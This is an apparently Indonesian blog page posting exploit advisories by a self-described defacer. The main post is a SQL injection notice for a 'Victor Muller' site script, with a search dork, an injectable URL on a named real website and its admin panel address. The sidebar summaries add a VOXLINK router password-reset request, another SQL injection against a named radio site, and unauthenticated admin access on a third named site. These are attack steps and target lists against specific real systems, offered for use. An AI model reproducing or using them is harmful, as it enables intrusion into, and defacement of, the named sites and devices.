Langsung ke konten utama

Victor Muller v 2014 & 2015 sql injection vulnerability

========================================================================

| # Title     : Victor Muller v 2014 & 2015 sql injection vulnerability

| # Author    : Cyclo'sTextovert

| # email     : defacertersakiti@gmail.com

| # Tested on : windows 8.1 Français V.(Pro)

| # Version   : v 2014 & 2015

| # Vendor    : maniacscientist@gmail.com

| # Dork      : "Victor Muller © 2015"   shows.php?id=

========================================================================



poc :



http://www.tessa.lv/shows.php?id=125 ( inject her )



admin panel :



http://www.tessa.lv/admin/

Komentar

Postingan populer dari blog ini

VOXLINK Unlocked 4G LTE admin Password Reset

Exploit Title: VOXLINK Unlocked 4G LTE admin Password Reset # Author: SellerPwnd # Date: [2017-03-13] # Tested on: Windows 7 # Product Vendor: http://www.voxlink.com.cn ########################################################################################### Changing The Password is Very Easy Go To: http://192.168.199.1/cgi-bin/set_sys_basic.cgi Tamper it and Add This Post Data ipt_new_pass=admin And Now You Can Login With The Password admin

CH Radyo v.2 php script SQl injection vulnerability

======================================================================== | # Title     : CH Radyo v.2 php script SQl injection vulnerability | # Author    : Cyclo'sTextovert | # email     : defacertersakiti@gmail.com | # Tested on : windows 8.1 Français V.(Pro) | # Version   : v.2 | # Vendor    : http://www.scripti.org/script_ch-radyo-scripti_3292_27.html | # Dork      : "index.html?soru=" ======================================================================== poc : http://www.kissradyo.com/index.html?soru=15( inject her )

BozukRadyo v3.0 Unauthenticated Administrative Access vulnerability

======================================================================== | # Title     : BozukRadyo v3.0 Unauthenticated Administrative Access vulnerability | # Author    : Cyclo'sTextovert | # email     : defacertersakiti@gmail.com | # Tested on : windows 8.1 Français V.(Pro) | # Version   : v3.0 | # Vendor    : http://wmscripti.com/php-scriptler/bozukradyo-v3-radyo-scripti.html | # Dork      : n/a ======================================================================== poc : choose a target and add payload "panel/ayarlar.php" 1 - http://hitmusic.gen.tr/panel/ayarlar.php 2 - open pag source in line 121 to found pass of databass encrypted